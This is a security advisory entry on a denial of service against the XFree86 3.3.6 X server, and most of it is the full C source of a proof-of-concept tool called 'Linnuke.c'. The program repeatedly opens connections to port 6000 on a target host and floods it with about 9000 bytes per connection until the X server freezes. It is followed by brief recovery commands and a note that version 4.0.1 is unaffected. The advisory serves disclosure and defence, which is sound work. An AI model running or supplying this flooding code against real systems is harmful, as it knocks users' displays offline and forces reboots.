COMMAND

    XFree

SYSTEMS AFFECTED

    XFree86 Version 3.3.6

PROBLEM

    Following is based on a  Securax-SA-11 Security Advisory.  When  a
    large amount of characters are send to the X-windows deamon  (port
    6000), X-windows will become laggy  for a few secondes, so  if one
    would send a lot  of characters to it,  in a continious loop,  the
    server will freeze!, the only thing  that works as far as we  know
    to get X back to work is a reboot. [Not sure if author even  tried
    the Ctrl-Alt-BkSp kill stroke?  If that fails, you can usually log
    in remotely and try "killall -TERM  X" to give X a chance  to shut
    down cleanly.  And if  *that* fails, a "killall -KILL  X" followed
    by a "unset DISPLAY;  X :0.0" should kill  X rudely and reset  the
    video hardware (kill the second  X with the kill stroke  mentioned
    before)].

    X-windows servers can  be caused to  be laggy and  even to freeze,
    the code in this advisory is proof of concept code for this DoS.

    /* Linnuke.c (DoS)
     *
     * written by R00T-dude
     *
     * first of all, why the lame name
     * remember in the "good old days" the winnuke.c
     * well this gives about the same effect on linux
     * and probably any other form of unix that has
     * X-windows port (6000) open.
     *
     * greetz to: |ncubus, f0bic, F_F, nostalg1c, |vorlon, cicer0,
     * t-omicron, [tosh], demongirl, zym0t1c,segfau|t, so many others I forgot
     *
     */
    
    #include <stdio.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <string.h>
    
    main(int argc, char **argv)
    {
     int sock, conn, i, b;
     char buff[10000];
     struct sockaddr_in sin;
     struct hostent *hp;
    
     for(i=0; i<9000; i++)
     {
     strcat(buff, "\x41");  /* SHELLCODE ?? :) */
     }
     strcat(buff, "\n");
    
     if( (hp=gethostbyname(argv[1])) == NULL)
     {
      fprintf(stderr, "Gethostbyname() !"); exit(0);
     }
    
     for(b=0; b < b +1; b++)
     {
      sock = socket(AF_INET, SOCK_STREAM, 0);
      if (sock < 0)
      {
       fprintf(stderr, "Socket() !\n");  exit(sock);
      }
      sin.sin_family = AF_INET;
      sin.sin_port = htons(6000);
      sin.sin_addr.s_addr = *(unsigned long*)hp->h_addr_list[0];
    
      conn = connect(sock, (struct sockaddr *)&sin, sizeof(sin));
     if (conn < 0)
      {
       printf("Connect() !\n");
       /* don't exit(); or the loop will stop */
      }
    
      send(sock, buff, sizeof(buff), 0);
      close(sock);
     }
    }

SOLUTION

    Stock XFree86 4.0.1 appears not to be vulnerable.